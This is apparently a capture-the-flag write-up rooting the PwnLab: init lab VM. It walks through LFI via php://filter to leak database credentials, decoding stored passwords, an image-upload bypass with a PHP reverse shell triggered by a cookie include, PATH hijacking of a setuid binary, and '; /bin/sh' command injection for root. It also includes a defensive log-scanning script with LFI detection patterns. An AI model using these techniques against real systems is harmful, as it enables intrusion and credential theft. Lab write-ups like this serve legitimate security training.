Pwn Init Walkthrough:
I have tried b00ting up Fristileaks and Stapler, but have failed to do so on VMWare Workstation and Virtualbox. If anyone knows how, let me know.
Let's follow up with nmap to enumerate the host.
nmap -A -sV -p- 192.168.1.69
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-13 22:30 EDT
Nmap scan report for 192.168.1.69
Host is up (0.00065s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4      111/tcp   rpcbind
|   100000  2,3,4      111/udp   rpcbind
|   100024  1        35631/tcp   status
|_  100024  1        52870/udp   status
3306/tcp  open  mysql   MySQL 5.5.47-0+deb8u1
| mysql-info:
|   Protocol: 10
|   Version: 5.5.47-0+deb8u1
|   Thread ID: 40
|   Capabilities flags: 63487
|   Some Capabilities: SupportsLoadDataLocal, SupportsCompression, IgnoreSpaceBeforeParenthesis, Support41Auth, LongColumnFlag, LongPassword, Speaks41ProtocolNew, Speaks41ProtocolOld, SupportsTransactions, InteractiveClient, FoundRows, IgnoreSigpipes, DontAllowDatabaseTableColumn, ODBCClient, ConnectWithDatabase, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: cZwi(+>8;]G+>8<deP=!
|_  Auth Plugin Name: 88
35631/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:D8:B9:5C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.65 ms 192.168.1.69

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.71 seconds
We can see four open ports: 80, 111, 3306 and 35631.
I have tried SQL injection bypass methods, and they don't seem to work at the moment.
Let's run nikto against the web server and see what we can find.
root@kali:~/Downloads/exploits# nikto -h 192.168.1.69
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.69
+ Target Hostname:    192.168.1.69
+ Target Port:        80
+ Start Time:         2019-07-13 22:39:49 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Cookie PHPSESSID created without the httponly flag
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
Let's check out the /config.php file to see if there is sensitive information in there.
Requesting config.php directly gives nothing interesting: the PHP is executed server-side, so the browser only receives its output, not the source.
The ?page= parameter looks like a local file inclusion (LFI) point, and the php://filter wrapper lets us read the source of the included file instead of having it executed. More information can be found here.
Following that example, we can feed the php://filter wrapper into the LFI parameter, like so:
http://target_ip/?page=php://filter/convert.base64-encode/resource=config
The response contains config.php as a base64-encoded string.
Now, we can decode it.
PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+
When we decode it, we get:
<?php
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>
Snap! That's a good sign.
If we are lucky, the same credentials give us remote access to MySQL on port 3306.
root@kali:~/Downloads/exploits# mysql --user=root --password --host=192.168.1.69
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 54
Server version: 5.5.47-0+deb8u1 (Debian)
Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| Users              |
+--------------------+
2 rows in set (0.00 sec)
MySQL [(none)]> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [Users]> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users           |
+-----------------+
1 row in set (0.00 sec)
MySQL [Users]> select * from users
-> ;
+------+------------------+
| user | pass             |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.01 sec)
MySQL [Users]>
Under the users table we find three passwords encoded in base64. Decoded, they are:
user: kent password: JWzXuBJJNy
user: mike password: SIfdsTEn6I
user: kane password: iSv5Ym2GRo
These credentials let us log in to the web application as each of the three users.
After logging in as mike, we see that there is an uploader that could let us upload a shell. Now we need to do more recon on:
http://target_ip/?page=php://filter/convert.base64-encode/resource=upload
After decoding the base64 string that comes back, we get the page's source as follows:
<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
<body>
<form action='' method='post' enctype='multipart/form-data'>
<input type='file' name='file' id='file' />
<input type='submit' name='submit' value='Upload'/>
</form>
</body>
</html>
<?php
if(isset($_POST['submit'])) {
	if ($_FILES['file']['error'] <= 0) {
		$filename  = $_FILES['file']['name'];
		$filetype  = $_FILES['file']['type'];   // client-supplied Content-Type
		$uploaddir = 'upload/';
		$file_ext  = strrchr($filename, '.');  // everything from the last dot
		$imageinfo = getimagesize($_FILES['file']['tmp_name']);
		$whitelist = array(".jpg",".jpeg",".gif",".png");
		// check 1: extension must be in the whitelist
		if (!(in_array($file_ext, $whitelist))) {
			die('Not allowed extension, please upload images only.');
		}
		// check 2: client Content-Type must mention "image"
		if(strpos($filetype,'image') === false) {
			die('Error 001');
		}
		// check 3: getimagesize() must recognise the content as an image
		if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
			die('Error 002');
		}
		// check 4: Content-Type may contain only one slash
		if(substr_count($filetype, '/')>1){
			die('Error 003');
		}
		// stored name is the MD5 of the original file name plus the extension
		$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;
		if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
			echo "<img src=\"".$uploadfile."\"><br />";
		} else {
			die('Error 4');
		}
	}
}
?>
Looking at the code, the uploader only accepts files whose extension is .jpg, .jpeg, .gif or .png, whose Content-Type contains "image", and whose content getimagesize() recognises as an image; the file is then saved under upload/ as the MD5 of its original name plus that extension.
Let's see if we can tuck a shell in here.
Getting hold of a PHP shell isn't too hard. Just copy it from Kali Linux.
$ cp /usr/share/webshells/php/php-reverse-shell.php .
$ mv php-reverse-shell.php shell.gif
Looking back at index.php, we can see that the lang cookie is passed straight into include(), so we can manipulate it:
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
if (isset($_GET['page']))
{
include($_GET['page'].".php");
}
else
{
echo "Use this server to upload and share image files inside the intranet";
}
?>
</center>
</body>
</html>
Let's try to get a shell by pointing the lang cookie at our uploaded shell file using Burp Suite Community Edition.
Once the file is added, it should look something like this.
Now, reference the cookie of lang when you are done like this.
On the left side of Burp Suite we set the cookie to lang=../upload/f3035846cc279a1aff73b7c2c25367b9.gif (the path of your uploaded file), and our listener receives the connection.
That pops a reverse shell, and we are in.
Meanwhile, let's upgrade to a Python pty shell.
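As a defender's aside (an added example, not from the original post), the two include sinks in index.php, the ?page= parameter and the lang cookie, leave distinctive traces: stream wrappers such as php://filter and ../ traversal in the page value. This Python script scans Apache combined-log lines for exactly those patterns; the log lines and the client IP are constructed for the demonstration.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote

# Constructed sample Apache combined-log lines (not from the original post).
SAMPLE_LOG = """\
192.168.1.10 - - [13/Jul/2019:22:45:01 -0400] "GET /?page=login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.10 - - [13/Jul/2019:22:46:12 -0400] "GET /?page=php://filter/convert.base64-encode/resource=config HTTP/1.1" 200 301 "-" "Mozilla/5.0"
192.168.1.10 - - [13/Jul/2019:22:47:40 -0400] "GET /?page=../upload/f3035846cc279a1aff73b7c2c25367b9 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.1.10 - - [13/Jul/2019:22:48:03 -0400] "GET /?page=%2e%2e%2fupload%2fx HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.1.10 - - [13/Jul/2019:22:49:00 -0400] "GET /images/pwnlab.png HTTP/1.1" 200 9100 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Any scheme:// prefix (php://, data://, expect://, ...) handed to include()
WRAPPER_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)

def classify_page_param(value: str):
    """Return the reasons why a ?page= value looks like LFI abuse ([] if clean)."""
    reasons = []
    decoded = unquote(unquote(value))  # tolerate single and double URL-encoding
    if WRAPPER_RE.match(decoded):
        reasons.append("stream-wrapper:" + decoded.split("://", 1)[0].lower())
    if ".." in decoded.replace("\\", "/").split("/"):
        reasons.append("path-traversal")
    if "\x00" in decoded:
        reasons.append("null-byte")
    return reasons

def scan_log(text: str):
    """Return (line_no, page_value, reasons) for every suspicious request."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        qs = parse_qs(urlparse(m.group("target")).query, keep_blank_values=True)
        for value in qs.get("page", []):
            reasons = classify_page_param(value)
            if reasons:
                hits.append((no, value, reasons))
    return hits

if __name__ == "__main__":
    for no, value, reasons in scan_log(SAMPLE_LOG):
        print(f"line {no}: page={value!r} -> {', '.join(reasons)}")
```

The lang cookie sink is invisible in the default combined log format; logging %{Cookie}i or inspecting requests at a proxy is needed to catch lang=../upload/... the same way.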
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@pwnlab:/$
Now, we can su to different users and check out their directories.
I have tried su (switching users) into different users for kent and mike.
www-data@pwnlab:/$ su kent
su kent
Password: JWzXuBJJNy
kent@pwnlab:/$ ls
ls
bin dev home lib media opt root sbin sys usr vmlinuz
boot etc initrd.img lost+found mnt proc run srv tmp var
kent@pwnlab:/$ cd ~
cd ~
kent@pwnlab:~$ ls
ls
kent@pwnlab:~$
There were no good results.
The user mike didn't work when I tried to login. Now, I am trying the user, kane.
I will now log in as kane using the
username: kane
password: iSv5Ym2GRo
Once I am in kane's home directory, I see that there is a path that we can subvert.
When I run ./msgmike, I see that there is something wrong with the cat executable. It has a linked path to that.
kane@pwnlab:~$ ./msgmike
./msgmike
cat: /home/mike/msg.txt: No such file or directory
kane@pwnlab:~$ echo "/bin/bash" > cat
kane@pwnlab:~$ ls -lash msgmike
ls -lash msgmike
8.0K -rwsr-sr-x 1 mike mike 5.1K Mar 17 13:04 msgmike
kane@pwnlab:~$ echo "/bin/bash" > cat
echo "/bin/bash" > cat
kane@pwnlab:~$ chmod 777 cat
chmod 777 cat
kane@pwnlab:~$ ls -lasht cat
ls -lasht cat
4.0K -rwxrwxrwx 1 kane kane 10 Aug 12 02:52 cat
kane@pwnlab:~$ export PATH=.:$PATH
export PATH=.:$PATH
kane@pwnlab:~$ ./msgmike
./msgmike
mike@pwnlab:~$ whoami
whoami
mike
mike@pwnlab:~$ cd /home/mike
cd /home/mike
mike@pwnlab:/home/mike$ ls
ls
msg2root
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: ; /bin/sh
Here, the message we type is handed to a shell unsanitised, so appending ; /bin/sh gives us command execution with euid=0(root).
; /bin/sh
# id
id
uid=1002(mike) gid=1002(mike) euid=0(root) egid=0(root) groups=0(root),1003(kane)
# whoami
whoami
root
Once we obtain root, we can finally get the flag.txt.
Alternatively, we can get r00t through the dirtycow.py exploit (a privilege-escalation exploit for Linux kernels vulnerable to Dirty COW).
Once we do a cat /root/flag.txt, we can get this message. Hope you enjoyed reading my detailed writeup.